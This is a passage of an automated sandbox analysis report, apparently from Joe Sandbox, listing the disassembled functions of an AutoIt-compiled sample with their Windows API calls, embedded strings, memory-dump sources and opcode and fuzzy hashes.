Opcode Fuzzy Hash: b19a1403ef4f31b4f978f2374e1dc0d6d41102cb8ff29ce668101dbe6356c04e
Instruction Fuzzy Hash: C0F06D32240559BBE3315AA29C0DEAB7A7CEFCAB11F000159FA44D1045D6AA1A0587B5

Function 00FF7230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00FF7243
EnterCriticalSection.KERNEL32(?,?,00FA0EE4,?,?), ref: 00FF7254
TerminateThread.KERNEL32(00000000,000001F6,?,00FA0EE4,?,?), ref: 00FF7261
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00FA0EE4,?,?), ref: 00FF726E

Part of subcall function 00FF6C35: CloseHandle.KERNEL32(00000000,?,00FF727B,?,00FA0EE4,?,?), ref: 00FF6C3F

InterlockedExchange.KERNEL32(?,000001F6), ref: 00FF7281
LeaveCriticalSection.KERNEL32(?,?,00FA0EE4,?,?), ref: 00FF7288

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: f3c51060c22c3ba37f71007f7b5785cb73516826ea7abb2e9ede62c51deb0207
Instruction ID: 41811a70889f9b3267b1bf7a860ee2c807a16c0e5f69283d45146ccba6ba8024
Opcode Fuzzy Hash: f3c51060c22c3ba37f71007f7b5785cb73516826ea7abb2e9ede62c51deb0207
Instruction Fuzzy Hash: EBF05E36540613ABD7212B64ED4C9EAB72AEF55722B100622F683E10A8CBBF5805DB50

Function 00FE8992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00FE899D
UnloadUserProfile.USERENV(?,?), ref: 00FE89A9
CloseHandle.KERNEL32(?), ref: 00FE89B2
CloseHandle.KERNEL32(?), ref: 00FE89BA
GetProcessHeap.KERNEL32(00000000,?), ref: 00FE89C3
HeapFree.KERNEL32(00000000), ref: 00FE89CA

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 6e4d38604d2b62773bfd6a0b74f3f31e73e02f4e4739f91c632e0358e6d82261
Instruction ID: 77187c5b7678651b70aa12be71918144b8a54512a7ef459dbd315f2e6e20cb8b
Opcode Fuzzy Hash: 6e4d38604d2b62773bfd6a0b74f3f31e73e02f4e4739f91c632e0358e6d82261
Instruction Fuzzy Hash: 28E0E536104402BBDB112FE1EC0C90ABF79FF8A322B108220F259C1078CB3F9428DB50

Function 010085ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01008613
CharUpperBuffW.USER32(?,?), ref: 01008722
VariantClear.OLEAUT32(?), ref: 0100889A

Part of subcall function 00FF7562: VariantInit.OLEAUT32(00000000), ref: 00FF75A2
Part of subcall function 00FF7562: VariantCopy.OLEAUT32(00000000,?), ref: 00FF75AB
Part of subcall function 00FF7562: VariantClear.OLEAUT32(00000000), ref: 00FF75B7

Strings

Incorrect Parameter format, xrefs: 0100864B, 0100880D
AUTOIT.ERROR, xrefs: 01008728

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: b3de47d3a6e1b14394b1c97a0bbc7f80bd322ddd1d097626ee9e71f98872167b
Instruction ID: 7ed3773376f30313b5c8ffd4d3abd6fd9b443c45116cb809676e406601ed9263
Opcode Fuzzy Hash: b3de47d3a6e1b14394b1c97a0bbc7f80bd322ddd1d097626ee9e71f98872167b
Instruction Fuzzy Hash: F691A270A08301DFDB11DF29C88495ABBE4FF89714F04896EF98A8B391DB35E905CB51

Function 00FF2A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00FAFC86: _wcscpy.LIBCMT ref: 00FAFCA9

_memset.LIBCMT ref: 00FF2B87
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF2BB6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00FF2C69
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00FF2C97

Strings

0, xrefs: 00FF2B73

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 01ca24914af3d82601c71b56a93cdd053f298fae869d8ff02739f0ed7ee85d23
Instruction ID: e0351c641c03a65669dc94a72792e7a88833fee4f5aa778809063e6de170d055
Opcode Fuzzy Hash: 01ca24914af3d82601c71b56a93cdd053f298fae869d8ff02739f0ed7ee85d23
Instruction Fuzzy Hash: 4A51F1719083059ED7A49E28D845A7F77E4EF85330F040A2DFA94D71E0DB78CD04AB52

Function 00FED56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00FED5D4
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00FED60A
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00FED61B
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00FED69D

Strings

DllGetClassObject, xrefs: 00FED610

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: f9bbaf1e807beb6c0b5e88ae28600fa922d913d8034ca2c4953e1ca56c470264
Instruction ID: d17489382af43859957267a1d406f51755b80e9f3fa0fa16131d7d62fa3aba1f
Opcode Fuzzy Hash: f9bbaf1e807beb6c0b5e88ae28600fa922d913d8034ca2c4953e1ca56c470264
Instruction Fuzzy Hash: C541E1B1600204EFDB14CF66C884B9A7BB9EF44314F1581ADEC099F205D7B6DD44EBA0

Function 00FF2753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF27C0
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00FF27DC
DeleteMenu.USER32(?,00000007,00000000), ref: 00FF2822
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,01055890,00000000), ref: 00FF286B

Strings

0, xrefs: 00FF27B5

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 3e55eef1e7b945dc729a01d38dac7dbaf8d91483bd6fac197360dfcee20ffe8e
Instruction ID: 3e45c7732908652db415a559a62e54f1c7d501d9ba60acbe210bde7566d255d0
Opcode Fuzzy Hash: 3e55eef1e7b945dc729a01d38dac7dbaf8d91483bd6fac197360dfcee20ffe8e
Instruction Fuzzy Hash: 3941F0706043059FDB60DF24CC84B6ABBE8EF85764F04492EFAA5972E1C734E804DB52

Function 0100D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0100D7C5

Part of subcall function 00F9784B: _memmove.LIBCMT ref: 00F97899

Strings

stdcall, xrefs: 0100D847
none, xrefs: 0100D8A0
cdecl, xrefs: 0100D81C
winapi, xrefs: 0100D836

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 752bfbdd5ac7801fc7840f03cfe792b086325f2b1f1107390b3d69dea833f500
Instruction ID: 394a1f0d3fcfcab8be08bd3d7a95e211d211a23b164d22d2ac0e2474334b465c
Opcode Fuzzy Hash: 752bfbdd5ac7801fc7840f03cfe792b086325f2b1f1107390b3d69dea833f500
Instruction Fuzzy Hash: 3031D670900205ABEF01EF99CC519FEB3B4FF04320F108A69E8A9972C1DB35EA05CB90

Function 00FE8E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 00FEAA99: GetClassNameW.USER32(?,?,000000FF), ref: 00FEAABC

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00FE8F14
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00FE8F27
SendMessageW.USER32(?,00000189,?,00000000), ref: 00FE8F57

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Strings

ListBox, xrefs: 00FE8ED3
ComboBox, xrefs: 00FE8E9E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$_memmove$ClassName
String ID: ComboBox$ListBox
API String ID: 365058703-1403004172
Opcode ID: 49184a425db4f8c7abb2a81a49c4ffd753e5333b374bb25c666f10b2ca3bcb90
Instruction ID: b1456aed877b63a0a3d4e6eaf3c8b33fe528bf3bc1c1e337cc1be872aa8c0261
Opcode Fuzzy Hash: 49184a425db4f8c7abb2a81a49c4ffd753e5333b374bb25c666f10b2ca3bcb90
Instruction Fuzzy Hash: 9521EE71A00244BAEF24BBB1DC859FFB769DF053A0F044529F429971E0DF3D480AAA10

Function 0100182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0100184C
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01001872
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 010018A2
InternetCloseHandle.WININET(00000000), ref: 010018E9

Part of subcall function 01002483: GetLastError.KERNEL32(?,?,01001817,00000000,00000000,00000001), ref: 01002498
Part of subcall function 01002483: SetEvent.KERNEL32(?,?,01001817,00000000,00000000,00000001), ref: 010024AD

Strings

, xrefs: 01001893

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 53ead88fdda718209e2b421ce429754cc51a2739c7836c18faa683a42b13c41b
Instruction ID: 18c2b4f20f18ecb7640102d7dd0a03c991df60f8b5e0ca86c0c3302761f2f73d
Opcode Fuzzy Hash: 53ead88fdda718209e2b421ce429754cc51a2739c7836c18faa683a42b13c41b
Instruction Fuzzy Hash: 9121AFB1500209BFFB229A64DC84EBF77EDFB48754F00412AF585D2180DB75CE0457A1

Function 010163E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F91D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00F91D73
Part of subcall function 00F91D35: GetStockObject.GDI32(00000011), ref: 00F91D87
Part of subcall function 00F91D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00F91D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 01016461
LoadLibraryW.KERNEL32(?), ref: 01016468
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 0101647D
DestroyWindow.USER32(?), ref: 01016485

Strings

SysAnimate32, xrefs: 0101643C

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: bce0d349c4eb97249dd59ffc94ac0b008ba18583e0c25295032b7ba9d615197b
Instruction ID: a265100c1ba8ec8b686f700230d2fe4f4355a6fd5c19b1cbf62b5f6305230bdb
Opcode Fuzzy Hash: bce0d349c4eb97249dd59ffc94ac0b008ba18583e0c25295032b7ba9d615197b
Instruction Fuzzy Hash: 9921A471140205BFEF118EA8DC40EBB77EEEF49368F104669FA9093099DBBADC419760

Function 00FF6D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00FF6DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF6DEF
GetStdHandle.KERNEL32(0000000C), ref: 00FF6E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00FF6E3B

Strings

nul, xrefs: 00FF6E36

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: aa062eebfca94e259d6acdcef7c6365645722f6039646076b2a7d9bdda2c57fe
Instruction ID: b2b69d4f6d93f325ad225e8552e66e5dd747d282486f18ac951c0d97700573ae
Opcode Fuzzy Hash: aa062eebfca94e259d6acdcef7c6365645722f6039646076b2a7d9bdda2c57fe
Instruction Fuzzy Hash: 4B21A175A0020EABDB209F29D804AAE77B4EF44730F204A19FEE0D72E0DB719815AB54

Function 00FF6E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00FF6E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00FF6EBB
GetStdHandle.KERNEL32(000000F6), ref: 00FF6ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00FF6F06

Strings

nul, xrefs: 00FF6F01

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 3f958ea31eb3ee77a3ffc16708b682fd35f0e77602ef278e4ea0f81a67d58bd7
Instruction ID: 84d516003f8239a5bcff930e25a66f56ddf71e93a11c0800c350a15a72ff5665
Opcode Fuzzy Hash: 3f958ea31eb3ee77a3ffc16708b682fd35f0e77602ef278e4ea0f81a67d58bd7
Instruction Fuzzy Hash: 172195769003099BDB209F69D804ABA77A4AF55730F200A19FEE0D72E0DB759850DB54

Function 00FFAC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00FFAC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00FFACA8
__swprintf.LIBCMT ref: 00FFACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,0101F910), ref: 00FFACFF

Strings

%lu, xrefs: 00FFACBB

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 1614cc9b81718b3439a29466c30722d2112f81134527eef409c8f82810c1114c
Instruction ID: d7a8ea822ac7457ae0cf6434571b3bd69f765e2a256b8b94062aa0ca8dcc9f34
Opcode Fuzzy Hash: 1614cc9b81718b3439a29466c30722d2112f81134527eef409c8f82810c1114c
Instruction Fuzzy Hash: 5821A170A00109AFDB10DF69CD45DEE7BB8EF49314B004069F909DB251DA79EA05DB21

Function 00FF1AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00FF1B19

Strings

KEYS, xrefs: 00FF1B30
EXISTS, xrefs: 00FF1B41
REMOVE, xrefs: 00FF1B1F
APPEND, xrefs: 00FF1B52

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: a7e5170feb154c80acabebc0e927df7759137077980411b3c34c412326e8b29e
Instruction ID: a96eae2270c4e5068409c3a48e76016af705188ae03629e04b66ca28783ace13
Opcode Fuzzy Hash: a7e5170feb154c80acabebc0e927df7759137077980411b3c34c412326e8b29e
Instruction Fuzzy Hash: 9F118E70900209CF8F00FFA4D8A19FEB3B4FF65704B1088A5D954672A6EB365D06EF40

Function 0100EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0100EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0100EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 0100ED6A
CloseHandle.KERNEL32(?), ref: 0100EDEB

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 52fe70af48da804fe7064ecb26992922094885e0ed567f817ea58b170faca15d
Instruction ID: f770c8d31f4f4544cc736257eb5c73a37f509ed6352a0a71c2ca50b8b227651c
Opcode Fuzzy Hash: 52fe70af48da804fe7064ecb26992922094885e0ed567f817ea58b170faca15d
Instruction Fuzzy Hash: F08171716047009FEB61EF28CC46F2AB7E5AF84710F44881DF999DB2D2DAB5AC41CB91

Function 00FB541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FB547B
_memcpy_s.LIBCMT ref: 00FB54ED
__read_nolock.LIBCMT ref: 00FB554B
__filbuf.LIBCMT ref: 00FB556E
_memset.LIBCMT ref: 00FB55B2

Part of subcall function 00FB8B28: __getptd_noexit.LIBCMT ref: 00FB8B28

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction ID: a8d1dcfacff91787810436db769749d68de6f413b12b8ebd2f461e0e8ab3d859
Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
Instruction Fuzzy Hash: DB51D771E00B05DBCB24DEAADC407EE77A6AF40B35F288729F825962D0D7789D51AF40

Function 01010037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 01010E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010100FD
